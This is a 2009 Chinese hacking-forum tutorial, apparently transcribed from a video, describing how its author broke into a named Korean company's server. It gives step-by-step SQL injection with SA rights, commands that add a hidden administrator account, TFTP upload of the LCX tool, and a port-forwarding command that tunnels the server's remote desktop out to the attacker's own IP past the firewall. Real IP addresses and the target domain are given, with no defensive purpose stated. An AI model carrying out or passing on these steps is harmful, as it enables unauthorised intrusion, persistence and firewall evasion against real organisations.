黑基网 首页 学院 电脑技术 查看内容

入侵韩国服务器

2009-2-12 04:54| 投稿: computer

摘要: 这个是来源于一个动画吧 大家好!今天给大家讲一下入侵韩国服务器 我们首先从WEB入手这个网站就是我们今天的目标 我们首先来看一下他用的是什么脚本程序 随便打开...
这个是来源于一个动画吧 大家好!今天给大家讲一下入侵韩国服务器 我们首先从WEB入手这个网站就是我们今天的目标 我们首先来看一下他用的是什么脚本程序 随便打开一个网页看看View.asp 是ASP的!  既然是ASP我们首先应该想到的是注入 因为这个方法是通用的用教主的这个工具来扫描一下  扫描结果已经出来了 接下来注入分析SA 是系统权限的  SA表示SQL服务的最高权限 有了这个权限我们可以直接执行系统权限的命令 好我们来到这个工具的高级命令这里  查看一下他的操作系统 type c:\boot.ini Windows 2000 Serve然后我们看一下 他的IP地址221.141.2.19   然后我们要判断一下这个SQL主机是不是和WEB主机在同一个服务器上 我们PING 一下网址 ping daewon.nth.co.kr  221.141.2.21 我们发现这个两个IP不一样 这就说明SQL服务器是独立的 那么我们要看一下他开没开3389终端服务net start用这个命令查看   Terminal Services  已经开了  我们加一个用户上去net user brucelu /add   这句是加一个BRUCELU的用户密码是空net localgroup administrators brucelu /add   这句是把BRUCELU这个用户添加到管理员组好!我们现在可以用远程桌面连接这个服务器拉 mstsc连接不上 一般出现这种情况有两种原因1.终端服务的断口改了 (这种情况的概率比较小)2.我们的连接被防火墙拦截了下来(这种情况比较高)我们首先应该考虑到第2种情况突破防火墙 我们用LCX这个工具把对方的3389端口转发到我们自己的电脑上  有一个前提就是我们的计算机必须是公网 如果你用的是内网 请到陆游器上映射一下端口好!我们用TFTP这个软件把 LCX这个工具传上去就是这个命令 把这里改成你自己的IP  这个是本地的文件地址  这个是服务器的文件地址我们刚才查看过了 他是2K的系统 所以系统目录是winnt的 这个文件名我们是随便命名的 在这里我就命了789 然后在服务器上执行一下这个命令我门看到 我们的TFTP出现了进度条 这说明正在下载我们的工具  好 已经成功了接下来我们用这个命令789.exe -slave 222.57.248.90 51 127.0.0.1 3389还是在这里改成你的外网IP  后面不用改然后我们在本地监视 返回的端口 在这里我选择了521端口 然后我们连接本机的IP  127.0.0.1:521呵呵!我们已经成功的突破了防火墙了2G内存 至强2.8的CPU  超级爽啊!呵呵   教程到这里就结束了
小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论


新出炉

返回顶部